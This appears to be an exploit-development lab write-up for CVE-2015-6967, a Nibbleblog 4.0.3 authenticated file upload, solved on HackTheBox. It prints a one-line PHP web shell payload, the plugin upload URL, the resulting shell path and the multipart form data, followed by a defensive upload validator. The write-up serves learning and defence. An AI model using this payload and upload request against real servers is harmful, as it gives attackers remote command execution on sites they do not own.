Introduction
# ExploitDev Journey #9 | CVE-2015-6967 | Nibbleblog 4.0.3 - Arbitrary File Upload
Original Exploit: https://www.exploit-db.com/exploits/38489 <br>
**Exploit name:** Nibbleblog 4.0.3 RCE <br>
**CVE**: 2015-6967 <br>
**Lab**: Nibbles - HackTheBox
### Description
Nibbleblog 4.0.3 has a flaw that lets an authenticated user upload a PHP shell. The upload behaves differently from the ones you have seen before: you can name your shell `r57.php` or anything else, but the name does not matter, because the file can only be reached through `image.php`. It may look as if you are overwriting the contents of `image.php` with your payload, but that is not quite what happens: you upload a file under whatever name you like, and the application exposes it only under the `image.php` name.
<br>
### How it works
In this session, you won't actually need the `gen_random_charset()` function because there is no point in naming your shell something unique. Here is how it works:
- You authenticate to the website using a username and password
- You upload an image through the plugins section of nibbleblog
- You open your shell and do business as usual
<br>
### Writing the exploit
First we define some important variables:
```py
# Target base URL; placeholder, set it to the lab host before running
rhost = "http://TARGET_HOST"
# Admin login form
login_url = f'{rhost}/nibbleblog/admin.php'
# Config page of the My Image plugin, which accepts the multipart upload
image_url = f"{rhost}/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image"
# Minimal PHP web shell: runs the value of the `rce` query parameter
payload = '<?php echo shell_exec($_GET["rce"]); ?>'
# The upload is always reachable under this fixed name, whatever filename was sent
shell_path = f"{rhost}/nibbleblog/content/private/plugins/my_image/image.php"
```
You are familiar with them all except that `shell_path` is just going to open `image.php` and not some file generated with random charset. <br>
You were already introduced to session management in Python and you already know how to log in to an application; this application is no different from what you have seen before.
The POST data that you are going to send is kind of long and might look odd to you:
```py
# Multipart form fields for the My Image plugin's config form. requests takes
# (filename, value) tuples; a filename of None means a plain form field.
data = {
    "plugin": (None, 'my_image'), "title": (None, 'My image'), "position": (None, 4), "caption": "",
    # The file part: the filename is ours to choose, but the server ignores it
    "image": ('doesnt_matter.php', payload, "application/x-php", {'Content-Disposition': 'form-data'}),
    "image_resize": (None, 1), "image_width": (None, 200), "image_height": (None, 200), "image_option": (None, 'auto')
}
```
The reason is that the application expects some odd fields along with the file: the image title, position, caption, height and width, and so on. The rest of the exploit is self-explanatory and should be easy for you to follow.
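As an added defensive illustration (not code from the write-up or from Nibbleblog), here is the kind of server-side check the plugin's image handler lacks: it treats the client-supplied filename and Content-Type as untrusted hints, requires a real image signature that agrees with the extension, and refuses bodies carrying a PHP open tag. The sample parts are constructed; the PHP one mirrors the `image` field of the request above.

```python
import re

# Constructed sample multipart parts: (filename, content_type, body).
# PHP_PART mirrors the `image` field of the write-up's request; PNG_PART is a
# PNG signature followed by filler, not a complete image.
PHP_PART = ("doesnt_matter.php", "application/x-php",
            b'<?php echo shell_exec($_GET["rce"]); ?>')
PNG_PART = ("logo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)

# Leading bytes of the formats the plugin should accept, mapped to a kind.
MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg",
         b"GIF87a": "gif", b"GIF89a": "gif"}
# Extension allow-list, mapped to the kind the signature must agree with.
EXT_KIND = {"png": "png", "jpg": "jpeg", "jpeg": "jpeg", "gif": "gif"}
# PHP open tags; `<?php`/`<?=` are unlikely in genuine image data, so this
# catches polyglots without flagging ordinary binary content.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def validate_image_upload(filename, content_type, data):
    """Return None if the upload passes, otherwise a rejection reason.

    The client-supplied filename and Content-Type are never trusted on their
    own: the body must carry a matching image signature and no PHP open tag.
    Re-encoding the image server-side is the stronger follow-up step."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in EXT_KIND:
        return f"extension {ext!r} not in allow-list"
    if not content_type.lower().startswith("image/"):
        return f"content-type {content_type!r} is not an image type"
    kind = next((k for sig, k in MAGIC.items() if data.startswith(sig)), None)
    if kind is None:
        return "no recognised image signature"
    if EXT_KIND[ext] != kind:
        return f"extension {ext!r} does not match detected {kind}"
    if PHP_TAG.search(data):
        return "embedded PHP open tag"
    return None


def check_samples():
    """Run both constructed parts through the validator."""
    return {name: validate_image_upload(*part)
            for name, part in (("php", PHP_PART), ("png", PNG_PART))}


if __name__ == "__main__":
    for name, verdict in check_samples().items():
        print(f"{name}: {'accepted' if verdict is None else 'rejected: ' + verdict}")
```

Note that even with this check in place, storing uploads under a `.php` name inside the web root is itself a risk; a non-executable upload directory removes the execution path entirely.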
<br>
### Final thoughts
In this exploit development session you learned that not all applications let you upload your own files under custom names. Some applications operate differently, and this web app is one of them: we had no say in choosing a name here, and our file is exposed as `image.php`, which isn't bad at all. In the end, all we need is the shell.
File snapshot
```text
[4.0K] /data/pocs/f1e0522372f94508d3e20700ee72c42dcda6a78c
├── [2.4K] exploit.py
└── [2.8K] README.md
0 directories, 2 files
```